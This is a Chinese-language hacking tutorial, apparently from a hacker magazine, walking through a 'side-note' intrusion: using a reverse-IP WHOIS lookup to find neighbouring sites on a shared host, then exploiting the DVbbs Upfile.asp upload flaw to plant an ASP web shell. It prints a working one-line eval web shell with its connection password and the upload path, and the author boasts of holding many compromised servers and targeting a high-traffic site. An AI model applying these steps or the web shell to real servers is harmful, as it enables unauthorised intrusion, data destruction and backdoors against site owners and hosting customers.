|
文章来源:安全中国
前段时间动网的Upfile.asp文件上传漏洞闹地沸沸扬扬,很多朋友可能利用这个漏洞得到了不少WebShell,我也利用它搞到了很多的WebShell,可是由于事情比较多,没能对已经放置了WebShell的虚拟主机进一步深入,现在空了,赶紧拿出了以前放置的WebShell……
TIPS:动网的Upfile.asp文件上传漏洞可以上传任何文件至服务器。凶器是ASP木马(如海阳顶端网ASP木马,冰河浪子微型ASP木马等),利用上传漏洞上传这些小巧而功能强大的ASP木马来入侵服务器。由于ASP是一种动态网页解析技术,加上黑客往往会破坏数据库造成整个论坛瘫痪、数据丢失,事后,要查出入侵者的IP也是非常麻烦的事。黑防前几期已经有非常详细的介绍,大家可以翻看以往的杂志。
我的这些肉鸡列表中,就数www.***.com网站最大,浏览量最高,要搞就搞大的。可惜这个网站的WebShell早已经被发现并删除了,我来看看有别的方法进去没有。
在网站上转了几圈,发现该网站的动网论坛已经由低版本升级到了最新的7.0 sp2,彻底杜绝了上传漏洞,而且这个网站的整站程序是由后台动态页面产生前台静态HTML页面,根本没有SQL注射的机会,转来转去还是一无所获!拿起扫描器,对这台主机进行了一番扫描,结果就发现了几个常见端口,几乎没有利用的可能。徘徊了好长时间,我还是别死钻牛角,想点别的办法来入侵吧!
既然正面来不行,那我就拐弯搞一次。据我估计,这个网站所在的主机一定是台虚拟主机,提供WEB空间出售,其中肯定还有别的网站,而这些网站十有八九存在当前最热门的动网论坛,嘿嘿!如果存在动网论坛是7.0 sp2以下的版本,那么就可以上传ASP木马,然后……越想越带劲,抓紧时间干。
TIPS:2004年第八期黑防上开始出现以“旁注”为内容的文章,实际上就是利用虚拟主机的特点,先利用注入漏洞入侵同一服务器上目标站点“旁边”的主机,然后再迂回攻击目标,这样的入侵路在最近的网络攻击事件中非常盛行。
步骤1:探测虚拟主机中的其它网站
要探测虚拟主机中的其它网站,在有些朋友看来好象有点不可能。其实只要借助这个网站:http://whois.webhosting.info就可以了!它是一家提供高级WHOIS服务的网站,可以对域名,IP等进行WHOIS查询,从而发现其中的大量信息。
TIPS:WHOIS服务是查询目标IP上有多少个域名指向,并且能查出这些域名的详细注册信息。这里给大家推荐一款小工具,非常方便而且整合了很多相关功能:桂林老兵网络信息综合查询工具,本期光盘有收录,大家可以试试它的功能。
我来对目标主机http://www.xx.com进行探测一下,在“Enter a domain name or an IP Address in the search box below:”中填写地址:http://www.***.com再查询,可以看到查到了这个主机上存在75个域名开放的情况(如图1所示),呵呵!看来这个空间主机还赚了不少钱呢!
打开这75个域名进行浏览,果然发现其中一个网站www.yyy.com存在一个低版本的动网论坛,这下好办了,开始上传ASP木马!
步骤2:上传ASP木马
动网文件上传漏洞的相关工具非常多,我这里用浪客联盟的工具:DVbbs Exploit。在URL中填写上传文件的具体URL地址:www.yyy.com/bbs/upfile.asp,上传路径中填写“data(即保存论坛数据库的文件夹)”,在文件名填写1.asp,然后在木马内容中复制冰狐浪子网页木马的内容:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(’heidan’)+’’)</SCRIPT>,注意:“heidan”是我设置的连接密码,如图2所示。
上传成功后,得到的木马地址是:www.yyy.com/bbs/data/1.asp. |
|